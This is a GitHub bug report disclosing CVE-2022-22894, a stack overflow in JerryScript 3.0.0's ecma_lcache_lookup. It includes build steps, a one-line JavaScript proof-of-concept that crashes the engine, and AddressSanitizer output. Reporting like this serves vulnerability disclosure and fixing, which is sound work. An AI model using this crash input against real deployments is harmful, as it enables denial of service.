Headline
CVE-2022-22894: Stack-overflow in ecma_lcache_lookup (ecma-lcache.c) · Issue #4890 · jerryscript-project/jerryscript
Jerryscript 3.0.0 was discovered to contain a stack overflow via ecma_lcache_lookup in /jerry-core/ecma/base/ecma-lcache.c.
JerryScript revision
Commit: 51da1551
Version: v3.0.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20
Test case
let array = new Array(1); array.splice(1, 0, array); array.flat(Infinity);
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ASAN:DEADLYSIGNAL
==26613==ERROR: AddressSanitizer: stack-overflow on address 0xff535ffc (pc 0x5661347c bp 0xff536090 sp 0xff536000 T0) #0 0x5661347b in ecma_lcache_lookup /root/jerryscript/jerry-core/ecma/base/ecma-lcache.c:144 #1 0x569cde1f (/root/jerryscript/build/bin/jerry+0x477e1f)
SUMMARY: AddressSanitizer: stack-overflow /root/jerryscript/jerry-core/ecma/base/ecma-lcache.c:144 in ecma_lcache_lookup ==26613==ABORTING
Credits: Found by OWL337 team.